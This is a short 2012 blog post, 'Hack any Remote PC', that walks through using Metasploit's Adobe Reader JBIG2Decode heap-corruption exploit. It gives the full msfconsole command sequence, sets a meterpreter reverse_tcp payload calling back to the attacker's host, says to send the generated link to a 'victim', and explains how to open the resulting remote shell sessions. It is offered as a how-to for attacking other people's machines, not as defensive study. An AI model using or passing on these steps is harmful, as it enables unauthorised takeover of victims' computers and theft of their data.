Saturday, September 29, 2012

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.
Exploit Targets

0 – Adobe Reader v9.0.0 (Windows XP SP3 English) (default)

1 – Adobe Reader v8.1.2 (Windows XP SP2 English)

Requirement


Attacker:metasploit

Victim PC: Windows XP

Open terminal type

msfconsole

use exploit/windows/browser/adobe_jbig2decode

Msf exploit(adobe_jbig2decode)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_jbig2decode)>set lhost 192.168.1.4(IP of Local Host)

Msf exploit (adobe_jbig2decode)>set srvhost 192.168.1.4(This must be an address on the local machine)

Msf exploit (adobe_jbig2decode)>set uripathakonsong(The Url to use for this exploit)

Msf exploit (adobe_jbig2decode)>exploit

Now an URL you should give to your victimhttp://192.168.1.4:8080/akonsong
 
When the victim opens that link in their browser, immediately it will alert a dialog box about akonsong PDF .

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

No comments:

Post a Comment